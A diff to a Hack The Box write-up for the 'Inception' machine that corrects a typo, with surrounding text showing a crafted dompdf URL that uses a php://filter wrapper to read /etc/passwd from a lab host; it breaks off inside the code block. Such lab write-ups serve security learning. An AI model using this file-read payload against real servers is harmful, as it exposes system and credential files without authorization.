jakobgoerke/hackthebox-machine-writeups/Inception/Readme.md

 Feelsgoodman

-We use the **33004.txt** and we craft a weburl whcih would look like this
+We use the **33004.txt** and we craft a weburl which would look like this

 ```
 http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd